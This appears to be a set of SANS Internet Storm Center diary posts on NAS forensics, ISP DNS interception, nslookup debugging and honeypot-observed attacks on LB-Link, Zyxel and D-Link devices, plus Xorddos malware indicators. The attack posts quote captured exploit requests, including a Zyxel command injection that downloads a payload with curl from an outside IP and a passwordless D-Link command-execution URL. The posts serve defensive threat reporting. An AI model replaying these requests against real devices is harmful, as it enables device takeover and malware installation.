  LV Write Access        read/write
  LV Creation host, time ,
  LV Status              NOT available
  LV Size                <7.26 TiB
  Current LE             1902336
  Segments               1
  Allocation             inherit
  Read ahead sectors     auto

You can see that the NAS has only one volume created ("volume_1" is the default name in DSM).

From now on, you can use /dev/vg1/volume_1 in your investigations. Mount it, scan it, image it, etc...

[1] https://en.wikipedia.org/wiki/Mdadm
[2] https://en.wikipedia.org/wiki/Logical_Volume_Manager_(Linux)
[3] https://kb.synology.com/en-br/DSM/tutorial/What_is_Synology_Hybrid_RAID_SHR

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Detecting XFinity/Comcast DNS Spoofing, (Mon, May 6th)

ISPs have a history of intercepting DNS. Often, DNS interception is done as part of a "value add" feature to block access to known malicious websites. Sometimes, users are directed to advertisements if they attempt to access a site that doesn't exist. There are two common techniques for DNS spoofing/interception:

  1. The ISP provides a recommended DNS server. This DNS server will filter requests to known malicious sites.
  2. The ISP intercepts all DNS requests, not just requests directed at the ISP's DNS server.

The first method is what I would consider a "recommended" or "best practice" method. The customer can use the ISP's DNS server, but traffic is left untouched if a customer selects a different recursive resolver. The problem with this approach is that malware sometimes alters the user's DNS settings.

Comcast, as part of its "Business Class" offer, provides a tool called "Security Edge". It is typically included for free as part of the service. Security Edge is supposed to interface with the customer's modem but can only do so for specific configurations. Part of the service is provided by DNS interception. Even if "Security Edge" is disabled in the customer's dashboard, DNS interception may still be active.

One issue with any filtering based on blocklists is false positives. In some cases, what constitutes a "malicious" hostname may not even be well defined; I could not find a definition on Comcast's website. But Bleeping Computer (www.bleepingcomputer.com) recently ended up on Comcast's "naughty list". I know all too well that it is easy for a website that covers security topics to end up on these lists. The Internet Storm Center website has been on lists like this before. Usually, sloppy signature-based checks will flag a site as malicious: an article may discuss a specific attack and quote strings triggering these signatures.

Comcast offers recursive resolvers to its customers: 75.75.75.75, 75.75.76.76, 2001:558:feed::1 and 2001:558:feed::2. There are advantages to using your ISP's DNS servers. They are often faster, as they are physically closer to your network, and you profit from responses cached for other users. My internal resolver is configured as a forwarding resolver, spreading queries among different well-performing resolvers like Quad9, Cloudflare, and Google.

So what happened to bleepingcomputer.com? When I wasn't able to resolve bleepingcomputer.com, I checked my DNS logs, and this entry stuck out:

broken trust chain resolving 'bleepingcomputer.com/A/IN': 8.8.8.8#53 

My resolver verifies DNSSEC. Suddenly, I could not verify DNSSEC, which is a good indication that either DNSSEC was misconfigured or someone was modifying DNS responses. Note that the response appeared to come from Google's name server (8.8.8.8).

My first step in debugging this problem was dnsviz.net, a website operated by Sandia National Laboratories. The site does a good job of visualizing DNSSEC and identifying configuration issues. Bleepingcomputer.com looked fine: Bleepingcomputer doesn't use DNSSEC. So why the error? There was another error in my resolver's logs that shed some light on the issue:

no valid RRSIG resolving 'bleepingcomputer.com/DS/IN': 8.8.8.8#53

DNSSEC has to somehow establish whether a particular zone supports DNSSEC or not. The parent zone offers "NSEC3" records to prove that a child zone is not signed. DS records, also offered by the parent zone, verify the keys you may receive for a zone. If DNS is intercepted, the requests for these records may fail, indicating that something odd is happening.

So, someone was "playing" with DNS. And it affected the various DNS servers I tried, not just Comcast's or Google's. Using "dig" to query the name servers directly, and skipping DNSSEC, I received a response:

8.8.8.8.53 > 10.64.10.10.4376: 35148 2/0/1 www.bleepingcomputer.com. A 192.73.243.24, www.bleepingcomputer.com. A 192.73.243.36 (85)

Usually, www.bleepingcomputer.com resolved to:

% dig +short www.bleepingcomputer.com
104.20.185.56
172.67.2.229
104.20.184.56

It took a bit of convincing, but I was able to pull up the web page at the wrong IP address:

[Screenshot of the Comcast block page]

The problem with these warning pages is that you usually never see them. Even if you resolve the IP address, TLS will break the connection, and many sites employ strict transport security. As part of my Comcast business account, I can "brand" the page, but by default, it is hard to tell that this page was delivered by Comcast.

But how do we know if someone is interfering with DNS traffic? A simple check I am employing is to look for the DNS timing and compare the TTL values for different name servers.

(1) Check timing

Send the same query to multiple public recursive DNS servers. For example:

% dig www.bleepingcomputer.com @75.75.75.75

; <<>> DiG 9.10.6 <<>> www.bleepingcomputer.com @75.75.75.75
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 8432
;; flags: qr rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 512
;; QUESTION SECTION:
;www.bleepingcomputer.com.    IN    A

;; ANSWER SECTION:
www.bleepingcomputer.com. 89    IN    A    104.20.185.56
www.bleepingcomputer.com. 89    IN    A    104.20.184.56
www.bleepingcomputer.com. 89    IN    A    172.67.2.229

;; Query time: 59 msec
;; SERVER: 75.75.75.75#53(75.75.75.75)
;; WHEN: Tue May 07 20:00:05 EDT 2024
;; MSG SIZE  rcvd: 101

Dig includes the "Query time" in its output. In this case, it was 59 msec. We expect a speedy time like this for Comcast's DNS server while connected to Comcast's network. But let's compare this to other servers:

8.8.8.8: 59 msec
1.1.1.1: 59 msec
9.9.9.9: 64 msec
11.11.11.11: 68 msec
113.113.113.113: 69 msec

The results are very consistent. The last one, in particular, is interesting: this server is located in China, and a genuine round trip to China should take considerably longer than 69 msec. Responses this uniform suggest they are all answered by the same nearby interception device.

(2) check TTLs

A recursive resolver will add a response it receives from an authoritative DNS server to its cache. The TTL for records pulled from the cache decreases with the time the response sits in the resolver's cache. If all responses come from the same resolver, the TTL should decrement consistently. This test is a bit less telling: often, several servers are used, and with anycast, it is not always easy to tell which server the response comes from. These servers do not always have a consistent cache.
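The check itself is easy to automate: for answers served from a single cache, the TTL plus the elapsed time since the first query should stay constant (it equals the record's original TTL). A rough sketch, with a hypothetical slack parameter to absorb clock jitter:

```python
def ttl_consistent(observations, slack=2):
    """observations: (seconds_since_first_query, ttl) pairs for one record.
    Served from a single cache, elapsed + ttl stays constant (the original TTL)."""
    expiries = [elapsed + ttl for elapsed, ttl in observations]
    return max(expiries) - min(expiries) <= slack

# TTL counting down consistently -> one cache behind the answers.
print(ttl_consistent([(0, 89), (10, 79), (30, 59)]))   # True
# TTL jumping around -> different caches, or something rewriting answers.
print(ttl_consistent([(0, 89), (10, 300), (30, 59)]))  # False
```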

Final Words

DNS interception, even if well-meaning, undermines some of the internet's basic trust mechanisms. Even if it is used to block users from malicious sites, it needs to be properly declared to the user, and switches to turn it off have to function. This could be a particular problem if queries to other DNS filtering services are intercepted. I have yet to test this for Comcast and, for example, OpenDNS.


---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

nslookup's Debug Options, (Sun, May 5th)

A friend was having unexpected results with DNS queries on a Windows machine. I told him to use nslookup's debug options.

When you execute a simple DNS query like "nslookup example.com. 8.8.8.8", you get an answer like this (notice that in my nslookup query, I terminated the FQDN with a dot: "example.com.", I do that to prevent Windows from adding suffixes):

You see the result of a reverse DNS lookup (8.8.8.8 is dns.google) and you get 2 IP addresses for example.com in your answer: an IPv6 address and an IPv4 address.

If my friend had been able to run a packet capture on the machine, he would have seen 3 DNS queries and answers:

A PTR query to do a reverse DNS lookup for 8.8.8.8, an A query to look up IPv4 addresses for example.com, and an AAAA query to look up IPv6 addresses for example.com.

One can use nslookup's debug options to obtain equivalent information, without doing a packet capture.

Debug option -d displays extra information for each DNS response packet:

Here is nslookup's parsed DNS response packet for the PTR query:

Here is Wireshark's dissection of this packet:

You can see that the debug output contains the same packet information as Wireshark's, but presented in another form.

The same applies for the A query:

And the AAAA query:

If you also want to see the DNS query packets, you can use debug option -d2:

Besides the parsed DNS query, you now also see the length in bytes of each DNS packet (the UDP payload).

Here is the A query:

And here is the AAAA query:

Didier Stevens
Senior handler
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Scans Probing for LB-Link and Vinga WR-AC1200 routers CVE-2023-24796, (Thu, May 2nd)

Before diving into the vulnerability, a bit about the affected devices. LB-Link, the maker of the devices affected by this vulnerability, produces various wireless equipment that is sometimes sold under different brands and labels. This will make it difficult to identify affected devices. These devices are often low-cost "no name" solutions or, in some cases, may even be embedded, which makes it even more difficult to find firmware updates.

Before buying any IoT device, WiFi router, or similar piece of equipment, please make sure the vendor does:

  1. Offer firmware updates for download from an easy-to-find location.
  2. Provide an "end of life" policy stating how long a particular device will receive updates.

Alternatively, you may want to verify if the device can be "re-flashed" using an open source firmware.

But let us go back to this vulnerability. There are two URLs affected, one of which showed up in our "First Seen URLs":

/goform/sysTools
/goform/set_LimitClient_cfg

The second one has been used more in the past; the first is relatively new in our logs. The graph below shows that "set_LimitClient_cfg" is much more popular. We only saw a significant number of scans for "sysTools" on May 1st.

The full requests we are seeing:

POST /goform/set_LimitClient_cfg HTTP/1.1
Cookie: user=admin

And yes, the vulnerability revolves around the "user=admin" cookie and a command injection in the password parameter. It is too trivial to waste more time on, but common enough that attackers keep trying. The NVD entry for the vulnerability was updated last week, adding an older PoC exploit to it. Maybe that got some kids interested in this vulnerability again.
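If you want to check your own web logs for these probes, matching on the two affected endpoints is enough. A hypothetical detection sketch:

```python
import re

# Flag requests probing the two vulnerable /goform/ endpoints.
SUSPICIOUS = re.compile(r"/goform/(sysTools|set_LimitClient_cfg)")

def is_probe(request_line):
    return bool(SUSPICIOUS.search(request_line))

print(is_probe("POST /goform/set_LimitClient_cfg HTTP/1.1"))  # True
print(is_probe("GET /index.html HTTP/1.1"))                   # False
```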

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Linux Trojan - Xorddos with Filename eyshcjdmzg, (Mon, Apr 29th)

I reviewed a filename, eyshcjdmzg, that is regularly uploaded to my DShield sensor and that I have been seeing since 1 October 2023. It maps to multiple hashes and has been labeled trojan.xorddos/ddos. These various files have only been uploaded to my DShield sensor by IP 218.92.0.60. Here is the timeline of the activity since 1 October 2023.

According to VirusTotal, the oldest file submission is b39633ff1928c7f548c6a27ef4265cfd2c380230896b85f432ff15c7c819032c [1], last submitted in Aug 2019; it was uploaded to the DShield sensor only once, on 7 March 2024.

This file can be detected with the "ET MALWARE DDoS.XOR Checkin via HTTP" rule from Proofpoint Emerging Threats Open.

Sandbox Analysis

I submitted file ea40ecec0b30982fbb1662e67f97f0e9d6f43d2d587f2f588525fae683abea73 to a few sandboxes, including AssemblyLine [7], to get all the indicators that were part of this sample:

Other indicators include a config file [5] that is used for C2 communications. I compared my results against other online sandboxes [8][9], and not much has changed in the most active sample [1].
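As the name suggests, Xorddos obfuscates its configuration with XOR. Once the key has been recovered from a sample, a generic repeating-key XOR routine is all that is needed to decode it (the key below is a placeholder for illustration, not the sample's actual key):

```python
from itertools import cycle

def xor_decode(data, key):
    # Repeating-key XOR: applying it twice with the same key round-trips.
    return bytes(b ^ k for b, k in zip(data, cycle(key)))

key = b"not-the-real-key"  # placeholder: recover the actual key during analysis
blob = xor_decode(b"pi.enoan2107.com:112", key)  # "encrypt" a config string
print(xor_decode(blob, key))  # b'pi.enoan2107.com:112'
```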

Indicators - Hashes

ea40ecec0b30982fbb1662e67f97f0e9d6f43d2d587f2f588525fae683abea73 - 65
cd9bc23360e5ca8136b2d9e6ef5ed503d2a49dd2195a3988ed93b119a04ed3a9 - 2
98e53e2d11d0aee17be3fe4fa3a0159adef6ea109f01754b345f7567c92ebebb - 1
b39633ff1928c7f548c6a27ef4265cfd2c380230896b85f432ff15c7c819032c - 1
ecc33502fa7b65dd56cb3e1b6d3bb2c0f615557c24b032e99b8acd40488fad7c - 1
b4a86fdf08279318c93a9dd6c61ceafc9ca6e9ca19de76c69772d1c3c89f72a8 - lib.xlsx
b4a86fdf08279318c93a9dd6c61ceafc9ca6e9ca19de76c69772d1c3c89f72a8 - lib.xlsxpi.enoan2107[.]com:112

Indicator - IP

218.92.0.60
114.114.114.114

Indicator - Domain

qq[.]com/lib.asp
qq[.]com/lib.xlsx
qq[.]com/lib.xlsxpi.enoan2107.com:112

Indicator - Email

keld@dkuug.dk 

[1] https://www.virustotal.com/gui/file/ea40ecec0b30982fbb1662e67f97f0e9d6f43d2d587f2f588525fae683abea73
[2] https://www.virustotal.com/gui/file/cd9bc23360e5ca8136b2d9e6ef5ed503d2a49dd2195a3988ed93b119a04ed3a9
[3] https://www.virustotal.com/gui/file/98e53e2d11d0aee17be3fe4fa3a0159adef6ea109f01754b345f7567c92ebebb
[3] https://www.virustotal.com/gui/file/b39633ff1928c7f548c6a27ef4265cfd2c380230896b85f432ff15c7c819032c
[4] https://www.virustotal.com/gui/file/ecc33502fa7b65dd56cb3e1b6d3bb2c0f615557c24b032e99b8acd40488fad7c
[5] https://www.virustotal.com/gui/file/b4a86fdf08279318c93a9dd6c61ceafc9ca6e9ca19de76c69772d1c3c89f72a8
[6] https://isc.sans.edu/ipinfo/218.92.0.60
[7] https://cybercentrecanada.github.io/assemblyline4_docs/
[8] https://www.hybrid-analysis.com/sample/ea40ecec0b30982fbb1662e67f97f0e9d6f43d2d587f2f588525fae683abea73/6542ca0426609dce5c06aef5
[9] https://www.hybrid-analysis.com/sample/f0e4649181ee9917f38233a1d7b6cbb98c9f7b484326f80c1bebc1fa3aef0645/65c332e1c38ced89350a1e94

-----------
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Another Day, Another NAS: Attacks against Zyxel NAS326 devices CVE-2023-4473, CVE-2023-4474, (Tue, Apr 30th)

Yesterday, I talked about attacks against a relatively recent D-Link NAS vulnerability. Today, scanning my honeypot logs, I found an odd URL that I didn't recognize. The vulnerability turned out to be a bit older, but it targets yet another NAS.

The sample request:

POST /cmd,/ck6fup6/portal_main/pkg_init_cmd/register_main/setCookie HTTP/1.0
User-Agent: Baidu
Accept: */*
Content-Length: 73
Content-Type: application/x-www-form-urlencoded
Host: [redacted]

pkgname=myZyXELcloud-Agent&cmd=%3bcurl%2089.190.156.248/amanas2&content=1

The exploit is simple: it attempts to download the "amanas2" binary and execute it. Sadly, I was not able to retrieve the file. VirusTotal does show the URL as flagged malicious by a couple of anti-malware tools [1].
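Decoding the URL-encoded POST body makes the injected command obvious; Python's standard library is enough for a quick look:

```python
from urllib.parse import parse_qs

# The captured request body, with the command injection in the "cmd" parameter.
body = "pkgname=myZyXELcloud-Agent&cmd=%3bcurl%2089.190.156.248/amanas2&content=1"
params = parse_qs(body)
print(params["cmd"][0])  # ;curl 89.190.156.248/amanas2
```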

Oddly, I am seeing this pattern only in the last couple of days, even though the vulnerability and the PoC were disclosed last year [2]:

Date Count
April 27th 56
April 28th 1530
April 29th 899
April 30th 749

Based on our logs, only one IP address exploits the vulnerability: %%ip: 89.190.156.248%%. The IP started scanning a couple of days earlier for index pages and "jeecgFormDemoController.do", likely attempting to exploit a deserialization vulnerability in jeecgFormDemoController.

[1] https://www.virustotal.com/gui/url/ed0f3f39dce2cecca3cdc9e15099f0aa6cad3ea18f879beafe972ecd062a8229?nocache=1
[2] https://bugprove.com/knowledge-hub/cve-2023-4473-and-cve-2023-4474-authentication-bypass-and-multiple-blind-os-command-injection-vulnerabilities-in-zyxel-s-nas-326-devices/

 

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

D-Link NAS Device Backdoor Abused, (Mon, Apr 29th)

At the end of March, NetworkSecurityFish disclosed a vulnerability in various D-Link NAS devices [1]. The vulnerability allows access to the device using the user "messagebus" without credentials. The sample URL used by the PoC was:

GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=<BASE64_ENCODED_COMMAND_TO_BE_EXECUTED>

In addition to not requiring a password, the URL also accepts arbitrary system commands, which must be base64 encoded. Initial exploit attempts were detected as early as April 8th. The vulnerability is particularly dangerous as some affected devices are no longer supported by D-Link, and no patch is expected to be released. D-Link instead advised customers to replace affected devices [2]. I have not been able to find an associated CVE number.
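To illustrate the encoding, here is what the "system" parameter would look like for "uname -m", the command we most often see in our logs:

```python
import base64

# The "system" parameter carries the command base64-encoded.
cmd = "uname -m"
encoded = base64.b64encode(cmd.encode()).decode()
print(encoded)                             # dW5hbWUgLW0=
print(base64.b64decode(encoded).decode())  # uname -m
```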

[Graph of hits for URLs that include "user=messagebus", with two distinct peaks: one early in April and one late in April]

After the initial exploit attempts at the beginning of the month, we now see a new distinct set of exploit attempts, some of which use different URLs to attack vulnerable systems. It appears that nas_sharing.cgi is not the only endpoint that can be used to take advantage of the passwordless "messagebus" account.

So far, we see these three different URLs:

/.most/orospucoc.cgi
/cgi-bin/nas_sharing.cgi
/cgi-bin/orospucoc.cgi

It is not clear if "orospucoc.cgi" represents a distinct vulnerability. It appears to be just another endpoint allowing command execution, like the original "nas_sharing.cgi" endpoint. I found no documentation mentioning the "orospucoc.cgi" endpoint. If anybody has an affected D-Link NAS device, let me know if this endpoint exists. In particular, "/.most/orospucoc.cgi" is odd. This URL starts showing up in our logs on April 17th. The term "orospucoc" in Turkish translates to the English "bitch", which could indicate that this is not an actual vulnerable URL, but a backdoor left behind by earlier attacks. The use of the directory ".most" and the payload "echo most" may also point to a backdoor rather than a valid binary shipped with the device's firmware.

Any feedback from DLink NAS users is appreciated.

The most common command executed is "uname -m", which is likely used to identify vulnerable devices. Other commands include:

echo    @hackerlor0510
echo    most

 

[1] https://github.com/netsecfish/dlink
[2] https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10383

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.